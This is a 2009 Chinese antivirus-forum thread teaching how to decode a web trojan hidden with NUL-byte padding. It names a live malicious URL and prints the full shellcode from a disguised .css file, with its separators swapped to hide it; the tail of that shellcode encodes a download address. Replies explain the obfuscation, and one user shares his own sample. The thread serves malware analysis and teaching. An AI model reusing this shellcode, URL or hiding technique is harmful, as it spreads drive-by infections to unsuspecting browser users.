解密中容易忽略网马类型 bbs.ikaka.com

networkedition - 2009-6-5 9:57:00

引用:

在昨天的每日安全播报中，遇到一个可能在初学解密过程中，会容易忽略的网马类型。因这个例子很典型，我们将作为教程来进行讲解，下面就来详细讲解一下。

恶意网址：http://cn.com.fengyunfz.com.cn/images/images/bf.htm，我们先来看一下用freshow工具，check链接后源代码截图。

大家看到上述截图后，可能会有一些疑惑，这个恶意网址源代码内容只有几个字符，这个几个字符应该也不会是什么加密形式吧，或这个链接地址失效等等的疑惑，但恰恰这里面是有玄机的。

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

networkedition - 2009-6-5 10:05:00

那么该如何进一步分析呢，在这里我们可以根据提供地址，将此网页文件下载下来(迅雷或网际快车等)，我们直接来看下载后的文件源代码内容是什么，详见截图：

networkedition - 2009-6-5 10:17:00

上图为我们下载bf.htm后，使用记事本打开后显示的源代码内容，再来进一步分析，我们看到源文件内容还是很乱，且有很多空格，需要将此源文件处理一下。在这里使用freshow的NULs功能，将源文件中空格过滤掉。先将源文件内容全选复制，粘贴至freshow上操作区域。见截图：

过滤选项选择NULs后点击filter过滤空格

networkedition - 2009-6-5 10:22:00

过滤空格后还需将处理好的源代码，通过点击up按钮从下操作区，上翻至上操作区。

处理后代码就一目了然了，红色框中已标出，此源文件中暗含一个Script。

networkedition - 2009-6-5 10:32:00

点击filter将script过滤出来，在数据收集区选中，点击check获取源文件。我们看到实际sfbf.css和bf.htm一样，都需要下载后使用NULs功能处理，具体可参见处理bf.htm方法，在这里就不再讲解。我们直接来看已经处理好的sfbf.css源文件内容：

[复制到剪贴板]

CODE:

varsfcode="b789090b789090b789090b789090b789090b789090b789090b7816EBb78335Bb7866D2b7889B8b7866A7b780431b784053b786642b78FA81b780151b78F37Cb7805EBb78E5E8b78FFFFb7860FFb7888C2b788BA7b78E6F8b78D497b7805C3b7804A6b78383Fb7891A7b7819A7b789FE7b78E42Cb7838BBb78FE2Cb781CAFb781950b78994Bb789AA5b781EA7b78E97Cb785AA0b78BAE1b78CD6Eb78F3F9b78A8CDb784AFEb78A249b78A4A7b785C45b7826E7b78649Fb7852D2b78EF2Eb78C097b78F2A5b78324Fb78ADA6b784CA7b78C55Eb78E9A6b78DECFb78B2C9b78DBA7b78C6D2b78D8CBb783DF3b785FA1b78B9B7b78B9A7b785232b78BA19b78BCA7b7880CFb78BEE7b78D5A7b78AA58b78FF58b78EE7Cb789383b7890F7b789358b784D87b78AF63b78087Cb78C86Fb78CACFb782BE7b789846b7832F7b78D2F1b785FEFb784037b784137b78E2CDb78B7FEb78CD2Cb787E2Ab78D2A7b78D7A7b78432Cb78D90Fb78DAA7b78262Cb7835F1b78DD47b78DEA7b782CF9b78BE02b789F2Cb780A83b78E282b78E4A7b78FFCDb78EBCDb78E7CDb782D2Cb78EDA4b782C3Bb7883A0b7847E0b78EA61b786564b78C7D9b78FA4Fb78F1A6b7898A7b78999Ab789E91b787E80b78F562b786BA3b78FF61b78BECFb783C0Cb7838A0b78822Cb7815BFb78FE48b78FFA7b7868CFb780BA0b786AA8b780BC0b7804A2b7850C0b78EA23b788CC2b7894ACb783A03b785A68b7861F8b788757b7891ACb788302b783C16b7810A9b7846A8b78EDC0b7813A8b78EBA8b7811FEb78D1ABb78176Fb786AC7b7837D2b785A6Fb787EACb7879D0b784AA8b784857b782CA0b787373b7876FBb786425b78739Cb78DBFBb7809FEb78E69Bb78DB23b783AC2b7882F1b78D74Ab78ECCEb7808ECb782C94b78A5A9b78A254b7820EFb7866F9b7863F8b7862F9b7865F9b7864F9b78A025b78369Bb7838A8b7868FAb786C57b78BAA4b78686Cb783DAAb785FA8b784E57b788244b7841ACb781423b780298b7816F3b78A4ABb78A7ABb78A6ABb78A9ABb78A52Bb7810ACb78C0FBb78AE72b781F5Fb78AE57b785440b78AF57b783B57b780A81b78DE9Eb7870FCb7898ACb789486b785788b7868C2b78E3F0b7859A8b782456b784E57b787D6Ab7834A8b78079Ab786012b789FABb789DD7b78A1BAb78648Cb789510b7866A8b7851A8b783C25b786D8Cb784465b787F6Ab78D4A8b786CBDb786EA8b786A43b786F10b7871A9b78C8A8b7870A8b780B56b786757b78626Ab7825A8b7812FCb7813ACb782D88b782D57b7826BCb782C6Bb783B23b783A94b78DC23b78FE80b7881E5b780875b7887BBb78B67Db78CF61b780CE9b7802ACb78CD25b788880b78B8C8b788361b789D16b785892b7887DCb785969b7892AFb78D262b786243b789B91b78E0C9b781D49b7887EBb785DABb789D23b783120b7858F1b78CAF9b78E823b781594b78B1DCb78A3D0b78F75Db78D423b78A088b78975Db78EC61b780BE9b7862ABb78739Bb7817A7b7890B8b78DF7Eb786DA0b78AA63b7874ABb7844E8b788B59b78C4B7b78EC4Fb78ED23b78B78Cb78D375b78BA23b783CE3b78A4F6b7864ABb78BE23b78B823b78176Db78E4F6b78566Bb78423Eb783F57b78B59Ab78CE39b782191b7847D5b78FCD1b785E4Eb788F72b78F5D3b7846D1b78AA64b786FB6b7823CCb788558b78F3D3b782531b786D38b789F21b78CD12b789E59b78018Db7854E5b78C798b780128b784207b78D9A8b78DAA8b787468b787074b782f3ab78692fb786f6cb786576b787a66b782e6cb786c69b78766fb786665b786c7ab78632eb786d6fb78632eb782f6eb786d69b786761b787365b78692fb78616db786567b782f73b78736ab78632eb787373b780000";varsionfull=0x40000;

networkedition - 2009-6-5 10:43:00

上述代码为已处理好的sfbf.css源文件内容，接下来简单分析一下，我们看到这个源代码中有很多b78，类似这种形式：b78xxxxb78，开头和结尾都是b78，中间是4位数字或字母的组合。和shellcode特征很相像，shellcode是以%u来作为分隔的，ok，我们来将代码处理一下。将b78替换为%u，这个源代码就变成了一个标准shellcode。

上图为已经替换好源代码内容。

networkedition - 2009-6-5 10:51:00

上述方法实际在网马解密中，也是经常使用到的方法。接下来的解密大家都应该知道如何来解密吧，两次esc后解出网马地址。

无敌vip - 2009-6-5 15:18:00

请教一下楼主，为什么用freshow看不到网马的源代码？貌似只是对网马做了简单的变形，用空格拆分而矣。。。。。。。。。:kaka2: :kaka2:

我就是想问，网马利用了什么方法，把自己的源代码隐藏掉呢？简单的加空格变形？希望楼主解释一下，谢谢咯:kaka14:

6709的空 - 2009-6-5 15:34:00

好高深啊

无敌vip - 2009-6-5 15:40:00

汗，用MDecoder能看到源代码了:kaka6:
估计是freshow的一个bug吧:kaka5:

无敌vip - 2009-6-5 15:54:00

再请教，这个是什么加密方式呢？解密的话，只把空格过滤掉就OK了。
我测试了下，给网马代码添加多一个空格，网马就不能顺利执行了.也就是说，通过一种加密方式给网马进行加密的。这种加密方式是什么呢？:kaka2: :kaka2:

250662772 - 2009-6-5 17:15:00

freshow好像是用Inet方式读取,所以读取不出来,下面是一位大牛说的话

[复制到剪贴板]

CODE:

Inet好像是那啥啥封装出来的按照ANSIC的规则遇到\0的话会自动中断读取 WinHTTP据说是根据返回的Contentlength读取字节所以遇到上面那种带\0的不会中断

250662772 - 2009-6-5 17:40:00

引用:

原帖由 无敌vip 于 2009-6-5 15:54:00 发表
再请教，这个是什么加密方式呢？解密的话，只把空格过滤掉就OK了。
我测试了下，给网马代码添加多一个空格，网马就不能顺利执行了.也就是说，通过一种加密方式给网马进行加密的。这种加密方式是什么呢？:kaka2: :kaka2:

加密方式就是加入了空字符,我自己加密了一个,应该一样的吧

附件: 250662772.rar

无敌vip - 2009-6-5 18:22:00

了解咯，呵呵

这文件你是怎样加密的？用什么工具加密？在线加密吗？:kaka2:

艾玛 - 2009-6-6 9:13:00

引用:

原帖由 networkedition 于 2009-6-5 10:43:00 发表
上述代码为已处理好的sfbf.css源文件内容，接下来简单分析一下，我们看到这个源代码中有很多b78，类似这种形式：b78xxxxb78，开头和结尾都是b78，中间是4位数字或字母的组合。和shellcode特征很相像，shellcode是以%u来作为分隔的，ok，我们来将代码处理一下。将b78替换为%u，这个源代码就变成了一个标准shellcode。

[attachimg]526147[/

6楼分析b78代码的最好解释看下图

教人方法，看明白代码才行啊

轩辕小聪 - 2009-6-6 15:28:00

引用:

原帖由 250662772 于 2009-6-5 17:15:00 发表
freshow好像是用Inet方式读取,所以读取不出来,下面是一位大牛说的话

[复制到剪贴板]

CODE:

Inet好像是那啥啥封装出来的按照ANSIC的规则遇到\0的话会自动中断读取 WinHTTP据说是根据返回的Contentlength读取字节所以遇到上面那种带\0的不会中断

Inet指的是InternetReadFile？
InternetReadFile跟本地的ReadFile一样并没有识别读到的内容中的字符，因此并不会受到\0的影响。
其实MDecoder就是用InternetReadFile读取源文件内容的。
\0字符的影响不在于用InternetReadFile读取的过程，而在于用SetWindowsText显示的过程，在这个过程中把缓冲区中的源文件内容当成字符串，这才会被截断。
看MDecoder源码你就很清楚了，在循环InternetReadFile获取源文件后，必须先调用_ReplaceNULL函数（这个是MDecoder作者自己写的）将\0字符给改成空格，然后才调用SetWindowsText显示。

至于Freshow的过程，应该是类似这样的：
CString str1与RichEdit对象关联，InternetReadFile把原文件内容写入另一块缓冲区，然后用=赋值操作直接给CString对象赋值，这时就会被截断。

无敌vip - 2009-6-6 22:35:00

是SetWindowText吧？MDecoder用汇编写的。。。很头大:kaka6:

ycgk - 2009-6-7 0:06:00

用decoder的winhttp模式也可以看到

完颜无泪 - 2010-3-3 15:54:00

学习了老师就是高啊膜拜膜拜 :kaka4:

hqvip - 2010-3-3 15:58:00

赶来学习，老师的讲解深入浅出，学生很受启发，以后还得多加锻炼:kaka12:

筠林碧湫 - 2010-3-3 19:57:00

用版主的方法试了结果今天的练习还是不行笔记本打开网页显示的内容和freshow里的一样啊

念初 - 2010-3-3 23:37:00

天啊，居然在这里

Luke8 - 2010-3-8 11:34:00

困惑挺久的问题ko了，十分感谢

springyun - 2010-5-25 17:00:00

学习了:kaka1:

瑞星卡卡安全论坛